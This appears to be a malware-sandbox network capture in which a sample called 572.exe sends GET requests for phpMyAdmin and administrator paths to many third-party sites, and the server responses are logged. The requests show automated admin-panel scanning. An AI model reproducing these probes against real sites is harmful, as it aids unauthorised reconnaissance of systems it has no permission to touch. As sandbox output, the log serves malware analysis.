Content-Type: text/html; charset="utf-8"
X-FB-Debug: hASojorMjBxwQK6gTx4nWEjg4b/BmSIYSktrdUGVx1UarjTCJP+RuQYoNBAbjPLK/19c7TQfgpU/u2gVJkFqvA==
Date: Mon, 05 Feb 2024 11:14:53 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
106 | 192.168.2.6 | 56142 | 172.66.43.117 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 208 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login.adf.ly
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: FLYSESSID=r2c0p26i5n0hv6h164082hcuoe
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 854 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                x-powered-by: adfly
                                                                                                                                                                                                                                                                                                                                                                location: https://adf.ly/?240
                                                                                                                                                                                                                                                                                                                                                                x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pgGE4iKqbvkHqn7Fk0N935x2LwckH7ySmykVnlSLHYb59GWBnCSeeKOA5xldAQUDR3S%2B1Jb8kZgpdKY9qtqzW3NG2DdiBo6%2ButHzz6I8kmk3qedXVQslhWwg31FdfnM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb7d0ceb458d-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
2024-02-05 11:14:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
107 | 192.168.2.6 | 55889 | 31.13.88.35 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 193 | OUT | GET /phpmyadmin/?locale=hi_IN&_rdr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: m.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:54 UTC | 786 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: datr=LcPAZQM9gzjNjJ56zu--bAs0; expires=Tue, 11-Mar-2025 11:14:53 GMT; Max-Age=34560000; path=/; domain=.facebook.com; secure; httponly
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fphpmyadmin%2F%3Flocale%3Dhi_IN&refsrc=deprecated&locale2=hi_IN&_rdr
                                                                                                                                                                                                                                                                                                                                                                reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0"
                                                                                                                                                                                                                                                                                                                                                                report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}
2024-02-05 11:14:54 UTC | 2156 | IN |
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' blob:
2024-02-05 11:14:54 UTC | 812 | IN |
Data Ascii:
cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 J


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
108 | 192.168.2.6 | 56532 | 31.13.65.7 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 180 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: lookaside.fbsbx.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 958 | IN | HTTP/1.1 400 Bad Path
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Proxy-Status: proxy_internal_response; e_isproxyerr="AcJj-NzuLH1VNBU5OSS87I6cfWQPanMfX2PQASUSiP9X7KgCzDDUUB7j2GeZEA"; e_clientaddr="AcKFwaBTxTas6SOQypQ6BiCJTQsjSOQG0XMjTyJzM3nscnHblFnj-pDsk47bx5I7o7jW3Z0_Xo_G83gS"; e_fb_vipport="AcIXAoFGQsW7DcdNc4jXId5RjlMc0vX3GaBbzymIVBHk3v_wpiZy_qr6rjax"; e_fb_vipaddr="AcKKrEpJP61xTbsX8u8NK6tOa1HQ5FJ_UxnDuSweJGBVXFf9aml35iTc5CBYSO_sUagmHw"; e_fb_requesthandler="AcJOE6Ltu3cMIqtbcvfrnKNa7O-MwEoci8dS71L7BeZ1VkyYps4tju4IHjrGvTjwEKtdbZTw-TORUYDx"; e_fb_builduser="AcK305DlXuYxd5Su1pXBRwWAN9_y_7vRailQxiroRp_JWHlzVWq6obrK6pO7cGBmggk"; e_fb_binaryversion="AcK7xQf5w_8IG43oQHRRfXWmMKkcyKq3uTUYsh5SqPKHhtfmh7wm0RsaLIubnvrXaeduhH6kAQcvUL32rcFr_zM-r6K-2YilXUA"; e_proxy="AcI4KaRtN3wusLrfZDSrUhbKI35af5bcdpFyd4mXDi3tWym3i3ErHuFxinZJQNDlSDtoHboHeiMqvfOZ"
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 2959
2024-02-05 11:14:53 UTC | 1 | IN | Data Raw: 3c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <
2024-02-05 11:14:53 UTC | 2958 | IN |
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: !DOCTYPE html><html lang="en" id="facebook"> <head> <title>Facebook | Error</title> <meta charset="utf-8"> <meta http-equiv="cache-control" content="no-cache"> <meta http-equiv="cache-control" content="no-store"> <meta http-equiv="c


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
109 | 192.168.2.6 | 56886 | 34.149.46.130 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 182 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC5706INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                set-cookie: sc-wcid=22d74ccb-015c-4e3d-b87e-d8ca27d63248; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:14:53 GMT; Max-Age=86400; Secure
                                                                                                                                                                                                                                                                                                                                                                expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: allow-from https://iframe.arkoselabs.com
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com 
https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com 
https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
x-cloud-trace-context: 6210582160b6e8ef09a6c15032b6adc9
date: Mon, 05 Feb 2024 11:14:53 GMT
server: API Gateway
Content-Length: 664
via: 1.1 google, 1.1 google
alt-svc: clear
strict-transport-security: max-age=31536000; includeSubDomains
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-02-05 11:14:53 UTC | 664 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><meta charset="utf-8"><meta name="referrer" content="origin"><meta name="apple-itunes-app" content="app-id=447188370"><title>404 &b


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
110 | 192.168.2.6 | 56612 | 172.66.41.20 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 177 | OUT | GET /administrator/ HTTP/1.1
Host: yellosa.co.za
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:54 UTC | 609 | IN | HTTP/1.1 302 Found
Date: Mon, 05 Feb 2024 11:14:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
location: http://www.yellosa.co.za/administrator/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=trfPGYEvF30TR8CHJybJ7A89e580%2Fy95MFJHjZOt2oW0xzas0wnKzJ95c7nZeklGN2764taL8rgq7znt6yRPW%2FwgXgqb14mdudwGEFeniJfV3BF%2Ftw%2FrD5v4jjcLgvyK"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 850abb7e995f4589-ATL
alt-svc: h3=":443"; ma=86400
2024-02-05 11:14:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
111 | 192.168.2.6 | 55257 | 185.120.71.24 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 173 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: analvids.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:54 UTC | 199 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 05 Feb 2024 11:14:54 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: https://www.analvids.com/phpmyadmin/
2024-02-05 11:14:54 UTC | 178 | IN | Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
112 | 192.168.2.6 | 56099 | 177.74.1.157 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:15:04 UTC | 102 | IN | Data Ascii: HTTP/1.0 408 Request Time-out
Cache-Control: no-cache
Connection: close
Content-Type: text/html
2024-02-05 11:15:04 UTC | 110 | IN | Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
113 | 192.168.2.6 | 57548 | 142.250.105.84 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:06 UTC | 245 | OUT | GET /administrator/index.php HTTP/1.1
Host: accounts.google.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: https://accounts.google.com/administrator/


Session ID | Source IP | Source Port | Destination IP | Destination Port
114 | 192.168.2.6 | 62804 | 3.161.150.69 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:07 UTC | 192 | OUT | GET /administrator/index.php HTTP/1.1
Host: account.booking.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:08 UTC | 2050 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
server: envoy
date: Mon, 05 Feb 2024 11:16:07 GMT
content-security-policy: frame-ancestors https://*.booking.com 'self'; report-uri https://nellie.booking.com/csp-report-uri?type=block&tag=212&pid=7ca24f3b5c0f003b&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgTofTsWVfilMYde8P2VbypUEfLchvSEFGAJezDrMX5xOf59abzqp9DKM_9-kmek_KA
content-security-policy-report-only: base-uri 'none'; connect-src saa.booking.com secure.booking.com reports.booking.com privacyportal-eu.onetrust.com geolocation.onetrust.com cdn.cookielaw.org www.google-analytics.com *.perimeterx.net *.pxchk.net *.px-cdn.net *.px-client.net *.px-cloud.net 'self' 'report-sample'; default-src *.bstatic.com bstatic.com 'self'; frame-src https://www.youtube.com/embed/Vv4w5SmRkss *.bstatic.com https://www.google.com bstatic.com www.booking.com secure.booking.com paymentcomponent.booking.com 'self'; img-src 'self' data: www.booking.com graph.facebook.com cdn.cookielaw.org account.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google-analytics.com www.google.com stats.g.doubleclick.net *.px-cloud.net *.perimeterx.net www.gstatic.com; object-src 'none'; report-uri https://nellie.booking.com/csp-report-uri?type=report&tag=213&pid=7ca24f3b5c0f003b&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgTofTsWVfilMYde8P2VbypUEfLchvSEFGAJezDrMX5xOf59abzqp9DKM_9-kmek_KA; script-src saa.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google.com www.google-analytics.com cdn.cookielaw.org geolocation.onetrust.com 'self' 'nonce-qg33KKQUzYnzfDG' 'report-sample'; style-src *.bstatic.com bstatic.com *.static.booking.cn 'self' 'unsafe-inline'
x-xss-protection: 1; mode=block
strict-transport-security: max-age=86400; includeSubDomains
X-Cache: Error from cloudfront
Via: 1.1 57674a900f587a3a1f1571205e001c6c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ATL59-P5
X-Amz-Cf-Id: UJ-tXhDVustfeRTAoDJdwDRthW-1YUhMwnI7BBaVXt6BJ-zAFdwIOA==
2024-02-05 11:16:08 UTC | 16384 | IN | Data Ascii: 55b8<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><title>Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0
2024-02-05 11:16:08 UTC | 5568 | IN | Data Ascii: _login_page","ws":"wss://b-iam-websocket-api.service","partner_forum":"https://partner.booking.com/en-us/node/27/?utm_content=27&utm_source=extranet_login_page"},"personalisation_displayed":0,"static_hostnames":["https://cf.bstatic.com"],"tracking_params"
2024-02-05 11:16:08 UTC | 5 | IN | Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                115192.168.2.663163170.114.52.2443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC337OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: gitam.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cf_bm=9aWbkbPT4DdlgG_jg44HMc41AE1.59S3JcFtxwJ.xgU-1707131766-1-AerVx9RXy0Zm7OnurxzYuId07SlHkitQXtOcQmpWK47Y6f+CHIBXVtzdIORdzJ1w/NBTDnTUsLHOaZpdNAQ/zfs=
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1349INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                x-zm-trackingid: v=2.0;clid=aw1;rid=WEB_6455cff9bec81e85c104a918f9ef0987
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: upgrade-insecure-requests; default-src https://*.zoom.us https://zoom.us blob: 'self'; img-src https: about: blob: data: 'self'; style-src https: safari-extension: chrome-extension: 'unsafe-inline' data: 'self'; font-src https: safari-extension: chrome-extension: blob: data: 'self'; connect-src * about: blob: data: 'self'; media-src * rtmp: blob: data: 'self'; frame-src https: ms-appx-web: zoommtg: zoomus: wvjbscheme: zoomprc: data: blob: 'self'; object-src 'none'; base-uri 'none';script-src 'self' 'strict-dynamic' 'nonce-BCeN5OvgRbWKWthsB8G9pg' 'unsafe-inline' blob: https:;
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_aid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_haid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_tmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_htmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1302INData Raw: 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 5f 7a 6d 5f 73 73 69 64 3d 61 77 31 5f 63 5f 6e 72 69 74 43 62 62 54 51 76 79 5a 75 4b 79 62 71 76 39 68 45 51 3b 20 44 6f 6d 61 69 6e 3d 7a 6f 6f 6d 2e 75 73 3b 20 50 61 74 68 3d 2f 3b 20 53 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 63 72 65 64 3d 41 43 43 43 34 33 42 46 42 30 45 36 43 45 34 36 44 44 36 36 33 36 45 38 31 33 44 45 38 38 30 42 3b 20 50 61 74 68 3d 2f 3b 20 53 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 5f 7a 6d 5f 63 74 61 69 64 3d 55 5a 35 42 4c 49 51 50 53 46 57 6d 4f 4b 65 52 79 54 46 47 31 77 2e 31 37 30 37 31 33 31 37 36 38 32 36 34 2e 62 30 34 64 38 34 30 61 39 39 63 64 32 34 34 66 66 65 37 61 36 66 62 31 34 30
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: set-cookie: _zm_ssid=aw1_c_nritCbbTQvyZuKybqv9hEQ; Domain=zoom.us; Path=/; Secure; HttpOnlyset-cookie: cred=ACCC43BFB0E6CE46DD6636E813DE880B; Path=/; Secure; HttpOnlyset-cookie: _zm_ctaid=UZ5BLIQPSFWmOKeRyTFG1w.1707131768264.b04d840a99cd244ffe7a6fb140
2024-02-05 11:16:08 UTC  620  IN
Data Ascii: set-cookie: _zm_visitor_guid=f328d5c851a64ef69b8da3afeb8eba88; Max-Age=31536000; Expires=Tue, 04 Feb 2025 11:16:08 GMT; Domain=zoom.us; Path=/; Securex-zm-zoneid: VAcontent-language: en-USCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"ht
2024-02-05 11:16:08 UTC  1369  IN
Data Ascii: 7ff9<!doctype html><html xmlns:fb="http://ogp.me/ns/fb#" lang="en-US"><head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# zoomvideocall: http://ogp.me/ns/fb/zoomvideocall#"><title>Page Not Found - Zoom</title><meta http-equiv="X-UA-Compati
2024-02-05 11:16:08 UTC  1369  IN
Data Ascii: , video conference, online meetings, web meeting, video meeting, cloud meeting, cloud video, group video call, group video chat, screen share, application share, mobility, mobile collaboration, desktop share, video collaboration, group messaging" /><meta
2024-02-05 11:16:08 UTC  1369  IN
Data Ascii: tion used around the world in board, conference, huddle, and training rooms, as well as executive offices and classrooms. Founded in 2011, Zoom helps businesses and organizations bring their teams together in a frictionless environment to get more done. Z
2024-02-05 11:16:08 UTC  1369  IN
Data Ascii: st_cookie.min.js" type="text/plain" class="optanon-category-C0004"></script><script nonce="BCeN5OvgRbWKWthsB8G9pg">window.zmGlobalMrktId = "f328d5c851a64ef69b8da3afeb8eba88" || null;window.zmGlobalMrktKey = "" || null;window['optimizely'] = window['op
2024-02-05 11:16:08 UTC  1369  IN
Data Ascii: icon-error {font-size: 17px;color: #E8173D;}.expired-cc-banner .zm-icon-close {color: #131619;cursor: pointer;}</style><script nonce="BCeN5OvgRbWKWthsB8G9pg" src="/csrf_js"></script><script nonce="BCeN5OvgRbWKWthsB8G9pg">window.dataLayer = wind
2024-02-05 11:16:08 UTC  1369  IN
Data Ascii: ref');if(cookiePrefDOM) {cookiePrefDOM.text = $.i18n.get("marketing.privacy.onetrust.cookie_pref");}var oneTrustConsentId = OneTrust.getDataSubjectId();var activeGroups = (OnetrustActiveGroups || '').split(',');activeGroups = activeGroups.filter(fun
2024-02-05 11:16:08 UTC  1369  IN
Data Ascii: order-left: 1px solid;margin-left: 10px;}#ot-do-not-sell {position: relative;padding-left: 42px !important;}#ot-do-not-sell::before {content: "";position: absolute;left: 6px;top: 50%;transform: translateY(-50%);width: 30px;height: 15px;back
2024-02-05 11:16:08 UTC  1369  IN
Data Ascii: trols="searchBox" tabindex="0"><span class="searchButtonIcon"><svg xmlns="http://www.w3.org/2000/svg" focusable="false" enable-background="new 0 0 20 20" viewBox="0 0 20 20" role="img"><g fill="currentColor"><path d="m8.368 16.736c-4.614 0-8.368-3.754


Session ID  Source IP    Source Port  Destination IP  Destination Port
116         192.168.2.6  63175        104.21.5.25     443

Timestamp  Bytes transferred  Direction  Data
2024-02-05 11:16:08 UTC  159  OUT
